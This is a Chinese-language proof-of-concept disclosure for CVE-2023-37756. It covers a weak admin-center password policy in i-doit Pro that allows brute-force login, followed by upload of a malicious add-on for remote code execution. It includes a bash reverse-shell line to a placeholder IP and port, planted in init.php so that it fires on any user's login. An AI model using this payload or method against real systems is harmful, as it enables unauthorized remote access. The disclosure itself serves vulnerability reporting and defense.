
针对CVE-2023-37756的概念验证:i-doit Pro管理中心的弱密码要求允许暴力登录和恶意插件上传,从而导致远程代码执行。
i-doit Pro 25及以下版本存在admin-center弱密码要求漏洞,并结合恶意插件上传可导致远程代码执行(RCE)漏洞。这些漏洞可能允许攻击者轻易通过暴力破解或密码猜测获取admin-center访问权限,并上传恶意插件以实现远程代码执行。
产品描述:i-doit是一款基于Web的开源IT文档与CMDB(配置管理数据库)软件,由synetics GmbH开发。i-doit Pro是该软件的商业版本,需要付费许可。它提供额外功能、专业支持以及定期更新与增强。用户需购买许可方可使用i-doit Pro,价格根据用户数量及所需功能而定。
漏洞描述:我们发现该Web应用程序在admin-center账户创建时存在弱密码要求,应用所有者甚至可以使用默认用户名“admin”设置最低1个字符的密码。这可能导致攻击者轻易通过暴力破解或密码猜测获取admin-center访问权限,并上传恶意插件以实现远程代码执行。
受影响页面:admin-center登录页面 + 插件安装
受影响的参数与组件:admin-center登录页面 + 插件安装
步骤1:由于admin-center账户创建时未实施密码要求或密码复杂度,我们可以从暴力破解开始。以下截图显示我们可以使用用户名“admin”及密码“1”登录。


步骤2:导航至“Add-on”标签页并选择上传

步骤3:存在一些要求,例如必须存在package.json,并且我们发现目标已实现异步检查所有类和函数。但我们可以从其客户门户下载一个合适的插件,然后编辑/添加init.php,这是防止触发payload时系统崩溃的最安全方法。 注意:请在行末加上 & 以防止payload触发后系统崩溃,init.php是注入payload的最佳位置 示例:exec ("/bin/bash -c 'bash -i >& /dev/tcp/IP/Port 0>&1 &'");



注意:记得将其重新压缩并上传


注意:点击“Install”然后激活选中的Add-on

注意:当有人登录时,你的payload将被触发,可以是任何人。
